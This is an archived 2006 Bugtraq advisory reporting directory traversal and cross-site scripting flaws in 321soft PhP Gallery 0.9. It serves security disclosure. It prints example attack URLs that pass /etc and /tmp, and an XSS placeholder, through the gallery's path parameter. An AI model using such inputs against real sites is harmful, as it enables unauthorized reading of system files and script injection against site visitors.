| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 2 May 2006 23:41:03 -0000 From: d4igoro@...il.com To: bugtraq@...urityfocus.com Subject: 321soft PhP Gallery 0.9 - directory travel & XSS 321soft PhP Gallery 0.9 - directory travel & XSS -------------------------------------------------------- Software: 321soft PhP Gallery Version: 0.9 Type: directory travel & XSS Date: Mai 3 01:38:04 CEST 2006 Vendor: 321soft.de Page: http://321soft.de/ Risc: Middle credits: ---------------------------- d4igoro - d4igoro[at]gmail[dot]com http://d4igoro.blogspot.com/ vulnerability: ---------------------------- http://[target]/index.php?path=/etc http://[target]/index.php?path=/tmp http://[target]/index.php?path=[XSS] solution: ---------------------------- index.php fix $path notes: ---------------------------- The vendor has been informed. http://d4igoro.blogspot.com/2006/05/321soft-php-gallery-09-directory.html
Powered by blists - more mailing lists